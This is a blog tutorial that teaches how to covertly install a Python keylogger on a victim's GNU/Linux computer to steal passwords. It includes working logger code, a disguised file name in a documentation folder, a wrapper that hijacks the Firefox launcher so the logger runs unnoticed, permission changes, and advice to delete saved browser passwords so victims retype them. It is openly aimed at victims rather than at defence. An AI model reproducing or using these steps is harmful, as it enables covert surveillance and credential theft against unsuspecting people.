Author: Jorge Maldonado Ventura
Category: Python
Date: 2023-02-01 16:00
Lang: en
Slug: registrador-de-teclas-i-langenkeyloggeri-básico-para-gnulinux
Tags: hack, keylogger, macOS, Python, security, Windows
Save_as: basic-keylogger-for-GNU-Linux-to-steal-passwords-and-typed-information/index.html
URL: basic-keylogger-for-GNU-Linux-to-steal-passwords-and-typed-information/
Title: Basic keylogger for GNU/Linux to steal passwords and typed information
Image: <img src="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png" alt="" width="1200" height="675" srcset="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png 1200w, /wp-content/uploads/2023/02/registrador-de-teclas-con-Python-600x337.png 600w" sizes="(max-width: 1200px) 100vw, 1200px">

A simple way to steal passwords is to install a keylogger on the
victim's computer. I am going to show how to do this on GNU/Linux using
the Python programming language.

The first thing to do is to obtain superuser permissions. If the
computer is managed by us, we already know the password. If not, we can
[get superuser access from GRUB](https://www.maketecheasier.com/reset-root-password-linux/). With
the necessary permissions, we are free to install the keylogger.

First of all, the `pynput` library must be installed executing...

    :::bash
    sudo pip install pynput

Next, we need to write the keylogger. This is the code we will use:

    :::python
    #!/usr/bin/env python3
    from pynput.keyboard import Key, Listener
    import logging

    log_dir = "/usr/share/doc/python3/"

    logging.basicConfig(filename=(log_dir + "log"), \
            level=logging.DEBUG, format='%(asctime)s: %(message)s')

    def on_press(key):
        logging.info(str(key))

    with Listener(on_press=on_press) as listener:
        listener.join()

The keylog is stored in `log_dir`. In this case, I have specified the
GNU/Linux Python 3 documentation folder. The keylogger can also be
stored in the same directory, perhaps with the name
<code>compile_docs.py</code> or something similar to avoid attracting
attention. Ideally, choose a folder that the victim is not going to
enter to prevent them from realising what we are doing.

The last step would be to run the program every time the computer is
turned on or a program is started <span id="step2">without the victim
noticing</span>. If, for example, we want to start the keylogger every
time the user opens Firefox, we can modify the Firefox command. <!-- more -->We can
rename `firefox`[^1] to `firefox.bin` and create the following file
called `firefox`:

    :::bash
    python3 /usr/share/doc/python3/compile_docs.py &
    exec firefox.bin "$@"

To find out which `firefox` file is executed when you click on its icon,
go to `/usr/share/applications`, enter the file `firefox.desktop` (or
`firefox-esr.desktop`) and look for the line starting with `Exec`.

Next, we should give write permissions for users other than root to the
directory where we are going to store the typing log:

    :::bash
    sudo chmod o+w /usr/share/doc/python3

Finally, we should wait for the victim to use the computer to get their
passwords or any information they type that we want to obtain. The
keylog will be stored in the file `/usr/share/doc/python3/log`. But be
careful: the file can take up a lot of space if you don't delete it
from time to time, so it would be best to uninstall the keylogger after
you have obtained the information you need. Another option is to
configure it to [send the keylog information by email instead of saving
it to a file](/en/advanced-keylogger-for-GNU-linux-email-and-self-destruct), which would not take up much space on the victim's
computer, but that method requires the use of an email[^2].

If the victim has the passwords saved in the browser and does not need
to re-type them, we can delete the password file so that the victim is
forced to re-enter them. All in all, with ingenuity we can get a lot of
information, especially if we apply this method against less advanced
users, who will not be very suspicious. For more advanced users, it
might be best to compile the `compile_docs.py` program with [Nuitka](https://nuitka.net/), like I show [in the following article](/en/advanced-keylogger-for-GNU-linux-email-and-self-destruct).

[^1]: In Debian we need to modify the `firefox-esr` file.
[^2]: The advantage of sending passwords by email is that we do not need
    to go back to the victim's computer to open the log file, instead we
    receive the information periodically by email.
